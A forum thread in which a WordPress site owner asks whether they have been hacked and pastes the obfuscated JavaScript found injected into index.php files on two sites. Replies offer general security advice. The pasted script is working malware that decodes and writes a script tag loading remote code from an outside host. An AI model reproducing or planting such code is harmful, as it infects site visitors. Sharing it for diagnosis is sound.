Have I been hacked?

by Tom Lazenby 4 replies
Hey guys,

I have a couple of wordpress sites with RAP installed. A few days ago Site 1 completely stopped working. I'd type in my main URL and be greeted with a blank screen and one line of text...

"Parse error: syntax error, unexpected '?' in /home/mysite/public_html/mysite.com/index.php on line 18"

Luckily I could still log into my wordpress dashboard. I upgraded to the latest version of wordpress and my site came back. When I looked in the 'index.php' file for my site AND for all the index.php files for each of the rap products, I found this weird code...

<script type="text/javascript">var gRYBe1oT = "ihhu328ihhu335";var

ta0QoMGA0 = "ihhu33cihhu373ihhu363ihhu372ih"; var ta0QoMGA1 =
"hu369ihhu370ihhu374ihhu320ihhu"; var ta0QoMGA2 =
"374ihhu379ihhu370ihhu365ihhu33"; var ta0QoMGA3 =
"dihhu322ihhu374ihhu365ihhu378i"; var ta0QoMGA4 =
"hhu374ihhu32fihhu36aihhu361ihh"; var ta0QoMGA5 =
"u376ihhu361ihhu373ihhu363ihhu3"; var ta0QoMGA6 =
"72ihhu369ihhu370ihhu374ihhu322"; var ta0QoMGA7 =
"ihhu320ihhu373ihhu372ihhu363ih"; var ta0QoMGA8 =
"hu33dihhu322ihhu368ihhu374ihhu"; var ta0QoMGA9 =
"374ihhu370ihhu33aihhu32fihhu32"; var ta0QoMGA10 =
"fihhu363ihhu36fihhu375ihhu36ei"; var ta0QoMGA11 =
"hhu373ihhu36cihhu361ihhu376ihh"; var ta0QoMGA12 =
"u32eihhu373ihhu365ihhu372ihhu3"; var ta0QoMGA13 =
"76ihhu365ihhu36dihhu370ihhu333"; var ta0QoMGA14 =
"ihhu32eihhu363ihhu36fihhu36dih"; var ta0QoMGA15 =
"hu32fihhu32fihhu36dihhu36cihhu"; var ta0QoMGA16 =
"32eihhu370ihhu368ihhu370ihhu32"; var ta0QoMGA17 =
"2ihhu33eihhu320ihhu33cihhu32fi"; var ta0QoMGA18 =
"hhu373ihhu363ihhu372ihhu369ihh"; var ta0QoMGA19 = "u370ihhu374ihhu33e";
var Dr6aBsRr = "gBEj328ihhu335";var LMOjuKdO =
ta0QoMGA0+ta0QoMGA1+ta0QoMGA2+ta0QoMGA3+ta0QoMGA4+ ta0QoMGA5+ta0QoMGA6+ta
0QoMGA7+ta0QoMGA8+ta0QoMGA9+ta0QoMGA10+ta0QoMGA11+ ta0QoMGA12+ta0QoMGA13+
ta0QoMGA14+ta0QoMGA15+ta0QoMGA16+ta0QoMGA17+ta0QoM GA18+ta0QoMGA19;
mWh6WOln = LMOjuKdO.replace(/ihhu3/g,"%");var qxMicDSd = unescape;var
gRYBe1oT = "JZGKi28gBEj335";w9221 = this;var jb4cyJmr=w9221
["WJd5GoGJc2uG5mJGe2JnltJ".replace(/[J52WlG\:]/g, "")];jb4cyJmr.write
(qxMicDSd(mWh6WOln));</script><div id='modalWindow' class='jqmWindow'>
<div id='jqmTitle'> <button class='jqmClose'>

Luckily I had a backup and this code was nowhere to be found in my backup files. So someone or something has put this code on my site. I went through and deleted this code from all of my index.php files, changed all my passwords and so far so good.

Unfortunately, tonight I checked my second site, also wordpress but on a completely different server (different hosting company too) and EXACTLY the same thing has happened there.

Any ideas?
#main internet marketing discussion forum #hacked
Avatar of Unregistered
  • Profile picture of the author Headfirst
    Check your computer. Odds are the malware is on your computer and connecting through wordpress from there.

    I've been seeing this more and more. They may have been able to grab your passwords through your FTP client. FTP is a pretty insecure protocol. You should think about switching to SCP once you have everything figured out.

    But, to get back to my initial point, if to sites on two separate servers got hit with the same malware and the only thing tying to two systems together is your computer, then that is where the problem is.

    Sorry for the run on sentence...
    {{ DiscussionBoard.errors[3426312].message }}
  • Profile picture of the author clever7
    I know nothing about html codes, but hackers are terrible! They destroyed 4 of my blogger blogs in 2009 (with malware, after getting my codes) and nobody ever helped me with this matter. We have no protection online.

    I’m sorry I can’t help you. I’m just writing something because nobody answered to your post and I was a victim of a hacker in the past. What a terrible experience!

    You are not alone.

    {{ DiscussionBoard.errors[3426328].message }}
  • Profile picture of the author Slickest
    Were you using a theme you had bought? sometimes if you try to remove like the copyright or some other code from a theme you'll get some errors too - they don't like that .. and sometimes have stuff built in to do weird stuff if you do take it out - just throwing that out there (has happened to me)

    I found this forum (in German - just google translate) - that someone posted same problem - Security » JavaScript auf kompromittiertem Server » RootForum Community » Forum
    Slickest.com selling and brokering domain names since 1998!
    Need Adult Writing done? Contact me! Custom from PG to XX
    {{ DiscussionBoard.errors[3426367].message }}
  • Profile picture of the author theresagas
    i never got that problem but i am pretty afraid of hacking to my blogs as it imy blood and tears that i try to do everyday.
    {{ DiscussionBoard.errors[3426515].message }}
Avatar of Unregistered

Trending Topics